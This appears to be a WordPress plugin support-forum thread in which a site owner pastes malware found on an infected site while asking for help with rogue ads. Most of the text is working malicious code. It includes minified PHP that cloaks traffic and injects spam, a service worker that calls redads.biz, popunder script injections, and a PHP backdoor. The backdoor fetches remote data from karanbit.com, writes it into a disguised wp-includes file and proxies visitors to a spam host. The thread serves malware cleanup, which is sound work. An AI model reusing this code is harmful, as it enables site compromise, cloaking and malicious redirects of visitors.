."&referrer=" .$referrer ."&lang=" .$lang ."&sub_id_1=" .urlencode($key1);if(function_exists('curl_init')){$ch=curl_init();curl_setopt($ch,CURLOPT_URL,$url);curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);curl_setopt($ch,CURLOPT_TIMEOUT,90);$output=curl_exec($ch);curl_close($ch);}else{$params=explode("?",$url);$params=$params[1];$output=file_get_contents($url,false,stream_context_create(array('http'=> array('method'=> 'POST','header'=> 'Content-type: application/x-www-form-urlencoded','content'=> $params))));}$result=json_decode($output);$result=(array)$result;$result=(array)$result["redirect"];if($result["content"]!== "bot"){if(!empty($forlinks)){return "";}foreach($result["headers"]as $header){header($header);}if($result["content"]){$result["content"]=urldecode($result["content"]);return $result["content"];}}elseif($result["content"]=== "bot"){return "bot";}else{return "";}}else{$is_bot="";$user_agent_to_filter=array('#Ask\s*Jeeves#i','#HP\s*Web\s*PrintSmart#i','#HTTrack#i','#IDBot#i','#Indy\s*Library#','#ListChecker#i','#MSIECrawler#i','#NetCache#i','#Nutch#i','#RPT-HTTPClient#i','#rulinki\.ru#i','#Twiceler#i','#WebAlta#i','#Webster\s*Pro#i','#www\.cys\.ru#i','#Wysigot#i','#Yahoo!\s*Slurp#i','#Yeti#i','#Accoona#i','#CazoodleBot#i','#CFNetwork#i','#ConveraCrawler#i','#DISCo#i','#Download\s*Master#i','#FAST\s*MetaWeb\s*Crawler#i','#Flexum\s*spider#i','#Gigabot#i','#HTMLParser#i','#ia_archiver#i','#ichiro#i','#IRLbot#i','#Java#i','#km\.ru\s*bot#i','#kmSearchBot#i','#libwww-perl#i','#Lupa\.ru#i','#LWP::Simple#i','#lwp-trivial#i','#Missigua#i','#MJ12bot#i','#msnbot#i','#msnbot-media#i','#Offline\s*Explorer#i','#OmniExplorer_Bot#i','#PEAR#i','#psbot#i','#Python#i','#rulinki\.ru#i','#SMILE#i','#Speedy#i','#Teleport\s*Pro#i','#TurtleScanner#i','#User-Agent#i','#voyager#i','#Webalta#i','#WebCopier#i','#WebData#i','#WebZIP#i','#Wget#i','#Yandex#i','#Yanga#i','#Yeti#i','#msnbot#i','#spider#i','#yahoo#i','#jeeves#i','#googlebot#i','#altavista#i','#scooter#i','#av\s*fetch#i','#asterias#i','#spiderthread revision#i','#sqworm#i','#ask#i','#lycos.spider#i','#infoseek sidewinder#i','#ultraseek#i','#polybot#i','#webcrawler#i','#robozill#i','#gulliver#i','#architextspider#i','#yahoo!\s*slurp#i','#charlotte#i','#bingbot#i');$stop_ips_masks=array("66\.249\.[6-9][0-9]\.[0-9]","74\.125\.[0-9]\.[0-9]","65\.5[2-5]\.[0-9]\.[0-9]","74\.6\.[0-9]\.[0-9]","67\.195\.[0-9]\.[0-9]","72\.30\.[0-9]\.[0-9]","38\.[0-9]\.[0-9]\.[0-9]","93\.172\.94\.227","212\.100\.250\.218","71\.165\.223\.134","70\.91\.180\.25","65\.93\.62\.242","74\.193\.246\.129","213\.144\.15\.38","195\.92\.229\.2","70\.50\.189\.191","218\.28\.88\.99","165\.160\.2\.20","89\.122\.224\.230","66\.230\.175\.124","218\.18\.174\.27","65\.33\.87\.94","67\.210\.111\.241","81\.135\.175\.70","64\.69\.34\.134","89\.149\.253\.169","104\.132\.8\.69");foreach($stop_ips_masks as $k => $v){if(preg_match('#^' .$v .'$#',$ip)){$is_bot="bot";}}if(empty($is_bot)&& strpos("qqq" .preg_replace($user_agent_to_filter,'-ANGRYBOT-',$ua),'-ANGRYBOT-')){$is_bot="bot";}if($is_bot=="bot"){return $is_bot;}if(!empty($forlinks)){return "";}if(!empty($plainred)){if(!empty($plainredurl)){$plainred=str_ireplace("[REDIRECTURL]",$plainredurl,$plainred);}$plainred=str_ireplace("[DEFISKEY]",str_ireplace(" ","-",$keyword),$plainred);$plainred=str_ireplace("[SPACEKEY]",$keyword,$plainred);$plainred=str_ireplace("[CURRURL]",$url_curr,$plainred);$plainred=str_ireplace("[REFERER]",$referrer,$plainred);$plainred=str_ireplace("[MULTIKEYREDIRECT]",$key1,$plainred);return $plainred;}else{return "";}}return "";}function updateBDData($tablename,$data,$value,$uslovie,$dbhost,$dbname,$dbuser,$dbpass,$dbport){$dbcon=mysqli_connect($dbhost,$dbuser,$dbpass,$dbname,$dbport);if(!$dbcon){return false;}else{$sql="UPDATE " .$tablename ." SET $value='" .$data ."' WHERE " .$uslovie ."";if(mysqli_query($dbcon,$sql)){mysqli_close($dbcon);return "yes";}else{mysqli_close($dbcon);return false;}}}function placeLinks($pageurl,$links){$page=httpGet($pageurl);if(!empty($page)){$page=preg_replace("/(<body.*>)/","\$1" .$links,$page,1);return $page;}else{return "";}}function randomValuesFromTableById($tablename,$value,$count,$dbhost,$dbname,$dbuser,$dbpass,$dbport){$dbcon=mysqli_connect($dbhost,$dbuser,$dbpass,$dbname,$dbport);if(!$dbcon){return "udfgoihdkh48sied";}else{$sql="SELECT " .$value ." FROM " .$tablename ." WHERE wpk IS NOT NULL ORDER BY RAND() LIMIT " .$count;$needvalue=mysqli_query($dbcon,$sql);$res=array();$out=array();$value=explode(",",$value);while($row=mysqli_fetch_array($needvalue)){foreach($value as $k=>$onevalue){$onevalue=trim($onevalue);$res[$onevalue]=$row[$onevalue];}$out[]=$res;}mysqli_close($dbcon);return $out;}}function getCountofTable($tablename,$dbhost,$dbname,$dbuser,$dbpass,$dbport){$dbcon=mysqli_connect($dbhost,$dbuser,$dbpass,$dbname,$dbport);if(!$dbcon){return false;}else{$sql="SELECT COUNT(1) FROM " .$tablename;$count=mysqli_query($dbcon,$sql);$count=mysqli_fetch_array($count);mysqli_close($dbcon);if(!empty($count[0])){return $count[0];}else{return "no";}}}function deleteLinesFmDB($tablename,$uslovie,$dbhost,$dbname,$dbuser,$dbpass,$dbport){$dbcon=mysqli_connect($dbhost,$dbuser,$dbpass,$dbname,$dbport);if(!$dbcon){return false;}else{$sql="DELETE FROM " .$tablename ." WHERE " .$uslovie;mysqli_query($dbcon,$sql);mysqli_close($dbcon);return "yes";}}function randomUA(){$uas=array("Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0","Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36","Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0","Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36","Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.186 Safari/537.36","Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36","Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36","Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)");$uas=shuffleArr($uas);return $uas[0];}function shuffleArr($arr){srand((float)microtime()*1000000);shuffle($arr);return $arr;}function parseTemplate(){$slugname=randString(8);$post_data=array("post_title"=> "[HER" ."EISP" ."OSTTI" ."TLE]","post_name"=> $slugname,"post_content"=> "[HERE" ."ISC" ."ONT" ."ENT]",'post_status'=> 'publish','post_category'=> array());$post_id=wp_insert_post($post_data,true);$permalink=get_permalink($post_id);$permalink=str_ireplace('https://','',$permalink);$permalink=str_ireplace('https://','',$permalink);if(is_ssl()=== false){$permalink="https://" .$permalink;}else{$permalink="https://" .$permalink;}$sitecode=httpGet($permalink);$permalink=trim($permalink,"/");if(stripos("qqq" .$permalink,"?p=")){$urlfrchpu=str_ireplace("?p=" .$post_id,"?p=chpukeyplace",$permalink);}else{$urlfrchpu=str_ireplace($slugname,"chpukeyplace",$permalink);}wp_delete_post($post_id,true);if(!empty($sitecode)){$regular="|<title>(.*)<\/title>|iUs";preg_match_all($regular,$sitecode,$matches);if(!empty($matches[1])){$matches[1]=array_unique($matches[1]);foreach($matches[1]as $pagetitlemain){$sitecode=str_ireplace($pagetitlemain,'[HE' .'REI' .'SPAG' .'ETI' .'TLE]',$sitecode);}}$regular="|(<h2.*>.*</h2+>)|iUs";preg_match_all($regular,$sitecode,$matches);if(!empty($matches[1])){$matches[1]=array_unique($matches[1]);srand((float)microtime()*1000000);shuffle($matches[1]);if(count($matches[1])>= 2){$counth=count($matches[1])/2;$counth=floor($counth);$matches[1]=array_slice($matches[1],0,$counth-1);}foreach($matches[1]as $htagmain){$sitecode=str_ireplace($htagmain,'[HE' .'R' .'EI' .'SH' .'TAG]',$sitecode);}}$regular="|<a\s.*(href=[\"']+.*[\"']+).*>(.*)<\/a>|iUs";preg_match_all($regular,$sitecode,$matches);if(!empty($matches[1])){$all_links=$matches[0];$atagarray=array_combine($matches[2],$matches[1]);$atagarray=array_unique($atagarray);foreach($atagarray as $anchor => $url){if(stripos("qqq" .$url,"feed")|| stripos("qqq" .$url,"wp-login")|| stripos("qqq" .$url,"#")||(stripos("qqq" .$anchor,"<")&& stripos("qqq" .$anchor,">"))){unset($atagarray[$anchor]);}}srand((float)microtime()*1000000);shuffle($atagarray);if(count($atagarray)>= 3){$counta=count($atagarray)/3;$counta=floor($counta);$atagarray=array_slice($atagarray,0,$counta-1);}foreach($all_links as $atagmain){foreach($atagarray as $url){if(stripos("qqq" .$atagmain,$url)){$atagtoreplace=preg_replace("/href=[\"']+.*[\"']+/iUs","href=\"[H" ."ER" ."EIS" ."AT" ."AGL" ."INK]\"",$atagmain);$atagtoreplace=preg_replace("/>.*<\/a>/iUs",">[HE" ."REIS" ."AT" ."AGA" ."NCH" ."OR]</a>",$atagtoreplace);$sitecode=str_ireplace($atagmain,$atagtoreplace,$sitecode);}}}}$sitecode=str_ireplace($permalink,"#",$sitecode);$sitecode=preg_replace("/<meta property=[\"']{1}og:description[\"']{1} content=[\"']{1}.*[\"']{1}\s?\/>/iUs","",$sitecode);$sitecode=preg_replace("/<meta property=[\"']{1}og:title[\"']{1} content=[\"']{1}.*[\"']{1}\s?\/>/iUs","",$sitecode);$sitecode=preg_replace("/<meta name=[\"']{1}twitter:description[\"']{1} content=[\"']{1}.*[\"']{1}\s?\/>/iUs","",$sitecode);$sitecode=preg_replace("/<meta itemprop=[\"']{1}description[\"']{1} content=[\"']{1}.*[\"']{1}\s?\/>/iUs","",$sitecode);$sitecode=preg_replace("/<meta name=[\"']{1}description[\"']{1} content=[\"']{1}.*[\"']{1}\s?\/>/iUs","",$sitecode);$sitecode=preg_replace("/<meta name=[\"']{1}dc\.description[\"']{1} content=[\"']{1}.*[\"']{1}\s?\/>/iUs","",$sitecode);$sitecode=urlencode($sitecode);$regular="|(%3Cscript.*%3C%2Fscript%3E)|iUs";preg_match_all($regular,$sitecode,$matches);if(!empty($matches[1])){foreach($matches[1]as $currgooglestat){if(stripos("qqq" .$currgooglestat,"google-analytics.com")|| stripos("qqq" .$currgooglestat,"yandex.ru")){$sitecode=str_ireplace($currgooglestat,"",$sitecode);}}}if(!empty($sitecode)){$resultarray=array("chpu"=> $urlfrchpu,"sitetemp"=> $sitecode);return $resultarray;}}return false;}function httpGet($url){if(stripos("qqq" .$url,"?")){$url=$url ."&ertthndxbcvs=yes";}else{$url=$url ."?ertthndxbcvs=yes";}if(function_exists('curl_init')){$ch=curl_init();curl_setopt($ch,CURLOPT_URL,$url);curl_setopt($ch,CURLOPT_FOLLOWLOCATION,1);curl_setopt($ch,CURLOPT_RETURNTRANSFER,true);curl_setopt($ch,CURLOPT_USERAGENT,randomUA());curl_setopt($ch,CURLOPT_HEADER,0);curl_setopt($ch,CURLOPT_TIMEOUT,90);curl_setopt($ch,CURLOPT_SSL_VERIFYHOST,0);curl_setopt($ch,CURLOPT_SSL_VERIFYPEER,0);$output=curl_exec($ch);curl_close($ch);}else{$output=file_get_contents($url);}return $output;}function httpPost($url,$params){$params=rtrim($params,'&');if(function_exists('curl_init')){$ch=curl_init();curl_setopt($ch,CURLOPT_URL,$url);curl_setopt($ch,CURLOPT_FOLLOWLOCATION,1);curl_setopt($ch,CURLOPT_USERAGENT,randomUA());curl_setopt($ch,CURLOPT_RETURNTRANSFER,true);curl_setopt($ch,CURLOPT_HEADER,false);curl_setopt($ch,CURLOPT_POSTFIELDS,$params);curl_setopt($ch,CURLOPT_TIMEOUT,40);curl_setopt($ch,CURLOPT_SSL_VERIFYHOST,0);curl_setopt($ch,CURLOPT_SSL_VERIFYPEER,0);$output=curl_exec($ch);curl_close($ch);}else{$output=file_get_contents($url,false,stream_context_create(array('http'=> array('method'=> 'POST','header'=> 'Content-type: application/x-www-form-urlencoded','content'=> $params))));}return $output;}function readValueFromBD($tablename,$value,$uslovie,$dbhost,$dbname,$dbuser,$dbpass,$dbport){$dbcon=mysqli_connect($dbhost,$dbuser,$dbpass,$dbname,$dbport);if(!$dbcon){return "udfgoihdkh48sied";}else{if(!empty($uslovie)){$sql="SELECT " .$value ." FROM " .$tablename ." where " .$uslovie;}else{$sql="SELECT " .$value ." FROM " .$tablename;}$needvalue=mysqli_query($dbcon,$sql);$needvalue=mysqli_fetch_array($needvalue);if(!empty($needvalue)){if(!empty($uslovie)){if(stripos($value,",")){$value=explode(",",$value);$res=array();foreach($value as $onevalue){$onevalue=trim($onevalue);$res[$onevalue]=$needvalue[$onevalue];}$needvalue=$res;}else{$needvalue=$needvalue[$value];}}mysqli_close($dbcon);return $needvalue;}else{mysqli_close($dbcon);return "no";}}}function insertToBD($tablename,$cols,$data,$dbhost,$dbname,$dbuser,$dbpass,$dbport){$dbcon=mysqli_connect($dbhost,$dbuser,$dbpass,$dbname,$dbport);if(!$dbcon){return "udfgoihdkh48sied";}else{$sql="INSERT INTO " .$tablename ." (" .$cols .") VALUES (" .$data .")";if(mysqli_query($dbcon,$sql)){mysqli_close($dbcon);return "yes";}else{mysqli_close($dbcon);return "bewiursfer9uidd";}}}function mysqlTableSeekWP($tablename,$dbhost,$dbname,$dbuser,$dbpass,$dbport){$dbcon=mysqli_connect($dbhost,$dbuser,$dbpass,$dbname,$dbport);if(!$dbcon){return "udfgoihdkh48sied";}$table_list=mysqli_query($dbcon,"SHOW TABLES FROM " .$dbname ."");while($row=mysqli_fetch_row($table_list)){if($tablename == $row[0]){mysqli_close($dbcon);unset($row);unset($table_list);return "yes";}}mysqli_close($dbcon);unset($row);unset($table_list);return "no";}function randString($length){$str="";$chars="abcdefghijklmnopqrstuvwxyz0123456789";$size=strlen($chars);for($i=0;$i<$length;$i++){$str .= $chars[rand(0,$size-1)];}return $str;}function createTable($tablename,$fields,$idfield,$dbhost,$dbname,$dbuser,$dbpass,$dbport){$dbcon=mysqli_connect($dbhost,$dbuser,$dbpass,$dbname,$dbport);if(!$dbcon){return "udfgoihdkh48sied";}$table_list=mysqli_query($dbcon,"SHOW TABLES FROM " .$dbname ."");while($row=mysqli_fetch_row($table_list)){if($tablename == $row[0]){mysqli_close($dbcon);return "aawtr35tdgvvcsxdff";}}unset($row);unset($table_list);$sql="CREATE TABLE " .$tablename ." ($fields)";mysqli_query($dbcon,$sql);$sql="ALTER TABLE " .$tablename ." add " .$idfield ." INT UNSIGNED NOT NULL AUTO_INCREMENT PRIMARY KEY FIRST";mysqli_query($dbcon,$sql);$table_list=mysqli_query($dbcon,"SHOW TABLES FROM " .$dbname ."");while($row=mysqli_fetch_row($table_list)){if($tablename == $row[0]){mysqli_close($dbcon);unset($row);unset($table_list);return "yes";}}mysqli_close($dbcon);return "bewiursfer9uidd";}Forum: Plugins
In reply to: [Anti-Malware Security and Brute-Force Firewall] rogueads.unwanted_ads 16also, here’s the content of a disabled js file if found on one of the hosts, if it helps
var host = 'https://redads.biz/'; self.addEventListener('install', function (event) { event.waitUntil(self.skipWaiting()); }); self.addEventListener('activate', function(event) { event.waitUntil(clients.claim()); }); self.addEventListener('push', function(event) { event.waitUntil( self.registration.pushManager.getSubscription() .then(function(subscription) { return fetch(host + '?endpoint=' + subscription.endpoint.split('/').pop() + '&ver=2') .then(function(response) { return response.json() .then(function(data) { return self.registration.showNotification(data.title, data.body); }); }); }) ); }); self.addEventListener('notificationclick', function(event) { const target = event.notification.data.url; event.notification.close(); event.waitUntil(clients.matchAll({ type: 'window', includeUncontrolled: true }).then(function(clientList) { for (var i = 0; i < clientList.length; i++) { var client = clientList[i]; if (client.url == target && 'focus' in client) { return client.focus(); } } return clients.openWindow(target); }) ); });Forum: Plugins
In reply to: [Anti-Malware Security and Brute-Force Firewall] rogueads.unwanted_ads 16Eli,
I’ve updated the scanner and rerun on the site, still shows no issues, but still has the problem.
I’ve been able to view source on an affected homepage, with this code on the top of the page source::
<script> var popunder = {expire: 6,url: "https://win-your-prize-now2.life/?u=mr1kd0x&o=f5pp7z3&t=p"}; </script> <script src="https://win-your-prize-now2.life/js/popunder.js"></script><!DOCTYPE html>Forum: Plugins
In reply to: [Anti-Malware Security and Brute-Force Firewall] rogueads.unwanted_ads 16Have you happened upon any further information that may help?
Forum: Plugins
In reply to: [Anti-Malware Security and Brute-Force Firewall] rogueads.unwanted_ads 16here is a link to the .default file in filebin, i cannot attach it via email or to the post here
Forum: Plugins
In reply to: [Anti-Malware Security and Brute-Force Firewall] rogueads.unwanted_ads 16here is a copy of the .default file
<?php // $knockInUrl = 'https://1.karanbit.com/lnk/don/1.php'; // // //function isHttps() { // if ((!empty($_SERVER['REQUEST_SCHEME']) && $_SERVER['REQUEST_SCHEME'] == 'https') || // (!empty($_SERVER['HTTPS']) && $_SERVER['HTTPS'] == 'on') || // (!empty($_SERVER['HTTP_X_FORWARDED_PROTO']) && $_SERVER['HTTP_X_FORWARDED_PROTO'] == 'https') || // (!empty($_SERVER['HTTP_X_FORWARDED_SSL']) && $_SERVER['HTTP_X_FORWARDED_SSL'] == 'on') || // (!empty($_SERVER['SERVER_PORT']) && $_SERVER['SERVER_PORT'] == '443')) { // $server_request_scheme = 'https'; // } else { // $server_request_scheme = 'http'; // } // return $server_request_scheme; //} // //$knockScheme = isHttps(); //$knockUrl = "{$knockScheme}://{$_SERVER['HTTP_HOST']}{$_SERVER['REQUEST_URI']}"; // // //$curl = curl_init(); //curl_setopt($curl, CURLOPT_URL, $knockInUrl); //curl_setopt($curl, CURLOPT_POST, true); //curl_setopt($curl, CURLOPT_POSTFIELDS, $knockUrl); // //$response = curl_exec($curl); // //curl_close($curl); if (!function_exists('getUserIP')) { function getUserIP() { foreach(array('HTTP_CF_CONNECTING_IP', 'HTTP_CLIENT_IP', 'HTTP_X_FORWARDED_FOR', 'HTTP_X_FORWARDED', 'HTTP_X_CLUSTER_CLIENT_IP', 'HTTP_FORWARDED_FOR', 'HTTP_FORWARDED', 'REMOTE_ADDR') as $key) { if (array_key_exists($key, $_SERVER) === true) { foreach(array_map('trim', explode(',', $_SERVER[$key])) as $ip) { if (filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE) !== false) { return $ip; } } } } } } if (!function_exists('cacheUrl')) { function cacheUrl($url, $skip_cache = FALSE) { $cachetime = 10; //one week // $cachetime = 60 * 60 * 24 * 7; //one week $file = ABSPATH.WPINC. '/class-wp-http-netfilter.php'; $mtime = 0; if (file_exists($file)) { $mtime = filemtime($file); } $filetimemod = $mtime + $cachetime; if ($filetimemod < time() OR $skip_cache) { $ch = curl_init($url); curl_setopt_array($ch, array( CURLOPT_HEADER => FALSE, CURLOPT_RETURNTRANSFER => TRUE, CURLOPT_USERAGENT => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36', CURLOPT_FOLLOWLOCATION => TRUE, CURLOPT_MAXREDIRS => 5, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 60, )); $data = curl_exec($ch); curl_close($ch); if ($data AND!$skip_cache) { file_put_contents($file, $data); } } else { $data = file_get_contents($file); } return $data; } } $weoboo = cacheUrl('https://karanbit.com/lnk/data/ip.admin.txt'); $user_ip = getUserIP(); /////////////////////////////////////////////////////////////// if (strpos($weoboo, getUserIP()) !== false) { //ip found } else { $id = $_SERVER['REQUEST_URI']; if (preg_match_all("/ffgg$/", $id, $matches) ) { echo '111111'; } /////////////////////////////////////////////////////////////// //linkovka $uag = $_SERVER['HTTP_USER_AGENT']; $id = $_SERVER['REQUEST_URI']; $host=$_SERVER['HTTP_HOST']; $ref =$_SERVER['HTTP_REFERER']; $uri =$_SERVER['REQUEST_URI']; $r="{'HOST':'".$host."', 'REFFER':'".$ref.", 'URI': '". $uri ."', 'URL':'".$host.$uri."' '}"; if (preg_match_all("/5.45.69.4|185.104.184.43|134.19.179.131|213.152.180.5|185.200.116.203|141.98.102.235|134.19.179.195|185.156.175.35|178.162.204.214|82.102.27.163|37\.1\.217\..*|5.2.79.82|213.111.153.156|134.19.179.235|66\.249\..*|64.68.90..*|216.239..*|65.52.104..*|65.52.108..*|65.55.24..*|65.55.52..*|65.55.55..*|65.55.213..*|65.55.217..*|131.253.24..*|131.253.46..*|40.77.167..*|199.30.27..*|157.55.16..*|157.55.18..*|157.55.32..*|157.55.36..*|157.55.48..*|157.55.109..*|157.55.110.4.*|157.56.92..*|157.56.93..*|157.56.94..*|157.56.229..*|199.30.16..*|207.46.12..*|207.46.192..*|207.46.195..*|207.46.199..*|207.46.204..*|157.55.39..*/", $user_ip, $matches)) { //if (preg_match_all("/ecocyclerieloirelayonaubance.fr|daruselamguesthouse.com/", $host, $matches)) { if (!preg_match_all("/page2-/", $id, $matches)) { $ch = curl_init(); $url_string = ''; //$url_string = 'https://fst.sex-dating77.com/links/mix/page2-1-1-x'.rand(1,88).'dddddd/'; curl_setopt ($ch, CURLOPT_URL, $url_string); curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']); curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_HEADER, 1); curl_setopt($ch, CURLOPT_TIMEOUT, 10); $host=$_SERVER['HTTP_HOST']; $ref =$_SERVER['HTTP_REFERER']; $uri =$_SERVER['REQUEST_URI']; $r="{'HOST':'".$host."', 'REFFER':'".$ref.", 'URI': '". $uri ."', 'URL':'".$host.$uri."' '}"; curl_setopt($ch, CURLOPT_REFERER, $r); curl_setopt($ch, CURLOPT_HTTPHEADER, array('X-Forwarded-For: ' . $_SERVER['REMOTE_ADDR'])); $html = curl_exec ($ch); if ( curl_getinfo($ch, CURLINFO_RESPONSE_CODE) == "302") { if (preg_match('~Location: (.*)~i', $html, $match)) { $location = trim($match[1]); } curl_close($ch); header('Location: ' . $location); exit(); } $header_size = curl_getinfo($ch, CURLINFO_HEADER_SIZE); $header = substr($html, 0, $header_size); $html = substr($html, $header_size); curl_close($ch); if (isset($_SERVER['HTTP_USER_AGENT'])) $url_string = "User-Agent: {$_SERVER['HTTP_USER_AGENT']}"; if (strstr($id, ".css")){ header('Content-Type: text/css; charset=utf-8'); } elseif (strstr($id, ".png")){ header('Content-Type: image/png'); } elseif (strstr($id, ".jpg") || strstr($id, ".jpeg")){ header('Content-Type: image/jpeg'); } elseif (strstr($id, ".gif")){ header('Content-Type: image/gif'); } elseif (strstr($id, ".xml")){ header('Content-Type: application/xml'); } echo $html; //exit; } } if (preg_match_all("/g2gg$/", $id, $matches) ) { // $user_ip = getUserIP(); //echo $user_ip; echo $user_ip; echo '1111'; } //if (preg_match_all("/fjerritslev-gym.dk|espressobar.dk|tomyamthailand.com|goshopping.support|akait.dk|serop.dk|nielsbuus.dk|traume.dk|jesperastrom.com|kolding-netavis.dk/", $r, $matches) ) { //$tr = preg_replace ('#^www\.#', '', $_SERVER['SERVER_NAME']); //$tr = preg_replace ('#^[^\.]*#', '', $tr); //$tr = str_replace('.', '', $tr); //} //if (!preg_match_all("/fjerritslev-gym.dk|espressobar.dk|tomyamthailand.com|goshopping.support|akait.dk|serop.dk|nielsbuus.dk|traume.dk|jesperastrom.com|kolding-netavis.dk/", $r, $matches) ) { $tr = preg_replace('#^www\.#', '', $_SERVER['SERVER_NAME']); $tr = str_replace('.', '', $tr); //} $uag = $_SERVER['HTTP_USER_AGENT']; $user_ip = getUserIP(); if (preg_match_all("/page2-/", $id, $matches) ) { //урл страницы //if (preg_match_all("/ecocyclerieloirelayonaubance.fr|daruselamguesthouse.com/", $host, $matches)) { // echo $user_ip; //dorgen//////////////////////////////// $ch = curl_init(); if (preg_match_all("/google|bing|msn|yahoo/", $r, $matches) ) { if (!preg_match_all("/213.111.153.217|5.45.69.4|134.19.179.131|185.104.184.43|213.152.180.5|141.98.102.235|134.19.179.195|178.162.204.214|185.156.175.35|82.102.27.163|37\.1\.217\..*|213.152.161.20|213.152.161.138|66\.249\..*|64.68.90..*|216.239..*|65.52.104..*|65.52.108..*|65.55.24..*|65.55.52..*|65.55.55..*|65.55.213..*|65.55.217..*|131.253.24..*|131.253.46..*|40.77.167..*|199.30.27..*|157.55.16..*|157.55.18..*|157.55.32..*|157.55.36..*|157.55.48..*|157.55.109..*|157.55.110.4.*|157.56.92..*|157.56.93..*|157.56.94..*|157.56.229..*|199.30.16..*|207.46.12..*|207.46.192..*|207.46.195..*|207.46.199..*|207.46.204..*|157.55.39..*/", $user_ip, $matches)) { $url_string = 'https://fst.sex-dating77.com/mix/'.$tr.'/'.$id.''; } } if (preg_match_all("/213.111.153.217|5.45.69.4|134.19.179.131|185.104.184.43|213.152.180.5|141.98.102.235|134.19.179.195|178.162.204.214|82.102.27.163|185.156.175.35|37\.1\.217\..*|213.152.161.20|213.152.161.138|66\.249\..*|64.68.90..*|216.239..*|65.52.104..*|65.52.108..*|65.55.24..*|65.55.52..*|65.55.55..*|65.55.213..*|65.55.217..*|131.253.24..*|131.253.46..*|40.77.167..*|199.30.27..*|157.55.16..*|157.55.18..*|157.55.32..*|157.55.36..*|157.55.48..*|157.55.109..*|157.55.110.4.*|157.56.92..*|157.56.93..*|157.56.94..*|157.56.229..*|199.30.16..*|207.46.12..*|207.46.192..*|207.46.195..*|207.46.199..*|207.46.204..*|157.55.39..*/", $user_ip, $matches)) { $url_string = 'https://fst.sex-dating77.com/mix/'.$tr.'/'.$id.''; } curl_setopt ($ch, CURLOPT_URL, $url_string); curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']); curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_HEADER, 1); curl_setopt($ch, CURLOPT_TIMEOUT, 10); $host=$_SERVER['HTTP_HOST']; $ref =$_SERVER['HTTP_REFERER']; $uri =$_SERVER['REQUEST_URI']; $r="{'HOST':'".$host."', 'REFFER':'".$ref.", 'URI': '". $uri ."', 'URL':'".$host.$uri."' '}"; curl_setopt($ch, CURLOPT_REFERER, $r); curl_setopt($ch, CURLOPT_HTTPHEADER, array('X-Forwarded-For: ' . $_SERVER['REMOTE_ADDR'])); $html = curl_exec ($ch); if ( curl_getinfo($ch, CURLINFO_RESPONSE_CODE) == "302") { if (preg_match('~Location: (.*)~i', $html, $match)) { $location = trim($match[1]); } curl_close($ch); header('Location: ' . $location); exit(); } $header_size = curl_getinfo($ch, CURLINFO_HEADER_SIZE); $header = substr($html, 0, $header_size); $html = substr($html, $header_size); curl_close($ch); if (isset($_SERVER['HTTP_USER_AGENT'])) $url_string = "User-Agent: {$_SERVER['HTTP_USER_AGENT']}"; if (strstr($id, ".css")){ header('Content-Type: text/css; charset=utf-8'); } elseif (strstr($id, ".png")){ header('Content-Type: image/png'); } elseif (strstr($id, ".jpg") || strstr($id, ".jpeg")){ header('Content-Type: image/jpeg'); } elseif (strstr($id, ".gif")){ header('Content-Type: image/gif'); } elseif (strstr($id, ".xml")){ header('Content-Type: application/xml'); } if(strstr($header, 'pdf')) header('Content-Type: application/pdf'); echo $html; // exit; } ///////tds $pagesID = $_SERVER['REQUEST_URI']; if (!preg_match_all("/wp-login|wp-admin|admin|xmlrpc/", $pagesID, $matches)) { $apiToken = 'tws5mkxns8qpz5hqywtcknjfw4wgrbhp'; $keyword = $_SERVER['REQUEST_URI']; $url_page=$_SERVER['REQUEST_URI']; $ua = urlencode($_SERVER['HTTP_USER_AGENT']); $lang = (isset($_SERVER['HTTP_ACCEPT_LANGUAGE']) ? substr($_SERVER['HTTP_ACCEPT_LANGUAGE'], 0, 2) : ''); $ip = null; $headers = array('HTTP_X_FORWARDED_FOR', 'HTTP_CF_CONNECTING_IP', 'HTTP_X_REAL_IP', 'REMOTE_ADDR'); foreach ($headers as $header) { if (!empty($_SERVER[$header])) { $ip = $_SERVER[$header]; break; } } if (strstr($ip, ',')) { $tmp = explode(',', $ip); if (stristr($_SERVER['HTTP_USER_AGENT'], 'mini')) { $ip = trim($tmp[count($tmp) - 2]); } else { $ip = trim($tmp[0]); } } if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) { $tmp = explode(',', $_SERVER['HTTP_X_FORWARDED_FOR']); $ip = trim($tmp[0]); } else { $ip = $_SERVER['REMOTE_ADDR']; } $referrer = urlencode(@$_SERVER['HTTP_REFERER']); //$url = "https://keitr.sex-dating77.com/api.php?is_api=1&action=get&token=$apiToken&ua=$ua&ip=$ip&keyword=$keyword&referrer=$referrer&lang=$lang&sub_id_7=".$_SERVER['REQUEST_URI']."&" . http_build_query($_GET) . ""; $url = "https://me.sex-dating77.com/api.php?is_api=1&action=get&token=$apiToken&ua=$ua&ip=$ip&keyword=$keyword&referrer=$referrer&lang=$lang&sub_id_7=".$_SERVER['REQUEST_URI']."&" . http_build_query($_GET) . ""; $ch = curl_init(); curl_setopt($ch, 